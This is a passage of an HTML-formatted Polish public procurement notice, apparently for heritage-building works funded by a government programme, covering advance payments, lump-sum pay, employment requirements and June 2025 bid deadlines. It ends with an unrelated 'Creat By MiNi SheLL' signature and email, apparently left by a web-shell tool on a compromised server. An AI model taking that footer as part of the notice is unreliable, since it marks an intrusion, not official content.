złożenia przez wykonawców wspólnie ubiegających się o udzielenie zamówienia kopii umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich partnerów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Strony ustalają, że wynagrodzenie Wykonawcy z tytułu wykonania umowy w kwocie określonej w ust. 2 będzie miało<br/>formę ryczałtu w rozumieniu art. 632 ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny (Dz.U. z 2023 r. poz. 1610 z<br/>późn.zm.). Płatność zgodnie z wnioskiem o dofinansowanie z Rządowego Programu Odbudowy Zabytków oraz<br/>regulaminem Programu realizowana będzie: w formie zaliczki<br/>w wysokości …………………..zł brutto (uwaga: wysokość zaliczki będzie stanowiła kwotę nie mniejszą niż 2%<br/>wynagrodzenia brutto wskazanego w ust. 2 i stanowić będzie wkład własny Zamawiającego w związku z dofinansowaniem<br/>inwestycji z Rządowego Programu Odbudowy Zabytków, wysokość kwoty zaliczki zależy od wysokości wynagrodzenia<br/>Wykonawcy wskazanego w ust. 2 wynikającego ze złożonej oferty) oraz na podstawie faktury końcowej, po wykonaniu<br/>kompletnego przedmiotu zamówienia i po odbiorze końcowym z uwzględnieniem zapisów określonych w ust. 5.<br/>2. Wynagrodzenie należne Wykonawcy za wykonanie kompletnego przedmiotu zamówienia na podstawie złożonej oferty<br/>wynosi …………………. zł brutto (słownie: ……………………………….. złote/ych …/100), (kwota netto: ………………………<br/>zł, podatek VAT ….. % …………………………zł.)<br/>3. Wynagrodzenie, o którym mowa w ust. 2 obejmuje wszystkie koszty niezbędne do prawidłowego wykonania przedmiotu<br/>umowy, wynikające wprost z dokumentacji projektowej, w tym ryzyko Wykonawcy z tytułu oszacowania wszelkich kosztów<br/>związanych z realizacją przedmiotu zamówienia, a także oddziaływania innych czynników mających lub mogących mieć<br/>wpływ na koszty.<br/>4. Niedoszacowanie, pominięcie oraz brak rozpoznania zakresu przedmiotu umowy nie może być podstawą do żądania<br/>zmiany wynagrodzenia ryczałtowego określonego w ust. 2.<br/>5. Podstawą do wystawienia faktury końcowej będzie protokół odbioru końcowego, stwierdzający wykonanie całości robót<br/>bez wad istotnych wstrzymujących odbiór robót, podpisany przez kierownika budowy, inspektora nadzoru i inne osoby<br/>reprezentujące Zamawiającego i Wykonawcę biorące udział<br/>w odbiorze.<br/>6. Zamawiający udzieli Wykonawcy zaliczki, o której mowa w ust. 1, i będzie ona dokonana przelewem na rachunek<br/>Wykonawcy wskazany w ust. 10 na podstawie faktury Vat zaliczkowej wystawionej przez Wykonawcę w terminie 30 dni od<br/>dnia podpisania umowy z 30 –dniowym terminem płatności.<br/>W pozostałym zakresie Wykonawca zapewni finansowanie inwestycji w części niepokrytej zapłaconym udziałem własnym<br/>Zamawiającego. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian określa projekt umowy stanowiący załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-18 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/swiecienadosa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-18 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający: nie zamierza zawierać umowy ramowej,<br/>nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt. 7 i 8 ustawy Pzp,<br/>nie wymaga i nie dopuszcza możliwości składania ofert wariantowych ,<br/>nie przewiduje możliwości prowadzenia rozliczeń w walutach obcych,<br/>nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej,<br/>nie przewiduje zwrotu kosztów udziału w postępowaniu,<br/>nie przewiduje wymagań, o których mowa w art. 96 ust. 2 pkt 2 ustawy Pzp,<br/>nie przewiduje zastrzeżenia możliwości ubiegania się o udzielenie zamówienia wyłącznie przez<br/>wykonawców, o których mowa w art. 94 ustawy Pzp,<br/>nie określa wymagań jakościowych, o których mowa w art. 246 ust. 2,<br/>nie wymaga i nie dopuszcza możliwości złożenia oferty w postaci katalogów elektronicznych lub dołączenia katalogów<br/>elektronicznych do oferty,<br/>nie przewiduje możliwości i nie wymaga złożenia oferty po odbyciu przez Wykonawcę wizji lokalnej oraz sprawdzeniu przez<br/>Wykonawcę dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamwiającego.<br/>nie przewiduje wyboru najkorzystniejszej oferty z możliwością prowadzenia negocjacji,<br/>nie wymaga obowiązku osobistego wykonania przez wykonawcę kluczowych zadań.<br/>Zamawiający wymaga na podstawie art. 95 ustawy Pzp zatrudnienia na podstawie stosunku pracy,<br/>w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2023 r. poz. 1465 ze zm.) przez<br/>wykonawcę lub podwykonawcę osób wykonujących wszystkie czynności<br/>związanych z wykonywaniem robót ogólnobudowlanych objętych przedmiotem zamówienia, –<br/>jeżeli wykonywanie tych czynności polega na wykonywaniu pracy w rozumieniu przepisów Kodeksu pracy, o ile czynności te<br/>nie będą wykonywane przez osobę w ramach prowadzonej przez nią działalności gospodarczej. Wymóg ten nie dotyczy<br/>między innymi osób kierujących budową.<br/>Sposób weryfikacji zatrudnienia tych osób, uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę<br/>wymagań związanych z zatrudnieniem tych osób oraz sankcje z tytułu niespełnienia tych wymagań zamawiający określił we<br/>wzorze umowy, stanowiącym Załącznik nr 5 do SWZ.<br/>Warunki i zasady realizacji zamówienia:<br/>Zamówienie będzie realizowane na zasadach i warunkach określonych w SWZ, w tym w załącznikach do SWZ, a zwłaszcza<br/>zawartych w szczegółowym opisie przedmiotu zamówienia i wzorze umowy.<br/>. Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawców w stosunku do których zachodzą<br/>okoliczności, wskazane w art. 7 ust. 1 ustawy z 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tj. Dz.U. z 2024r.,<br/>poz. 507 ze zm.)

Creat By MiNi SheLL
Email: jattceo@gmail.com